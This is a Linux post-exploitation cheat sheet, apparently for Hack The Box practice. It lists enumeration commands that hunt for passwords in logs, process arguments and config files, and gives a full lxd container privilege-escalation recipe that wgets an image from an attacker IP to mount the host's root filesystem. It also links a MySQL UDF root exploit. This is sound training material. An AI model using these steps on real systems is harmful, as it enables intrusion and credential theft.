Post Exploit Checks

General Enumeration

• Know if the environment is a real host

ls -la / # check if the root dir has .[dot] files we can know if its a docker env 
hostname

• Know the permissions of the user

sudo -l
id

• Know the users

cat /etc/passwd

• Check for .htaccess file

• /etc/apache2/sites-enabled/*

• /etc/nginx/nginx.conf

• /etc/ssh/sshd_config

• Application Specific Configs : wp-config, settings.php etc..,

Groups Exploitation

4(adm)

• The adm group members can view the log files

cd /var/log
grep -EnRi password .

Machine:

• Academy - HTB : https://www.youtube.com/watch?v=yQl5RA6APyQ&t=2620

• Doctor - HTB : https://youtube.com/watch?v=JcOR9krOPFY&t=1780

116(lxd)

• The lxd users can create a malicious docker like contents to load the /root of the machine in a containerized environment

# attacker machine
git clone  https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
./build-alpine

# victim machine
lxd init # yes to all 
wget http://10.10.14.71/alpine-v3.15-x86_64-20220227_1714.tar.gz
lxc image import ./alpine-v3.15-x86_64-20220227_1714.tar.gz --alias myimage
lxc image list
lxc init myimage ignite -c security.privileged=true # Exp Output: Creating ignite
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true # Exp Output: Device mydevice added to ignite
lxc start ignite
lxc exec ignite /bin/sh # shell will be obtained as root in the ignite container
cd /mnt/root # provides the root of the victim machine

Files Enumeration

• Find suid binaries

find / -perm /4000 -ls 2>/dev/null

• Find Writeable files

find / -type f -writable 2>/dev/null | grep -v proc

• Find files owned by the user (group specific)

# ! -path <path> - omits files from the mentioned directory
# -group <group name> - group name
find / -group www-data ! -path "/proc/*" ! -path "/var/www*" 2>/dev/null

• Locations to check

ls /opt
ls /usr/local/bin
ls ~/.local/bin

Background Jobs Enumeration

• Crontabs

crontab -l
cat /etc/crontab

• Enumerate processes with pspy

Network Enumeration

• Know the network adapters ( might be communicating internally )

ip a

• Open Ports and services

netstat -antp
# look for unusal services running interally or mysql service 

Process Enumeration

• Enumerate the services that are running

ps aux

• Get more information about the process (like the passed arguments etc.., it might contain passwords )

# know the process id from ps aux
cat /proc/<processid>/cmd

Web Directories

• Check the web directories for passwords

/var/www/*

MYSQL

• If MYSQL is running as root in the machine check for priv esc via library

• https://book.hacktricks.xyz/network-services-pentesting/pentesting-mysql#privilege-escalation-via-library

• https://raw.githubusercontent.com/d7x/udf_root/master/udf_root.py

• The \G option in the sql query of the mysql prints the information in a prettier format

# Connecting to mysql
mysql -u root -p 
# password prompt

mysql> select * from wp_users \G # instead of "select * from wp_users;"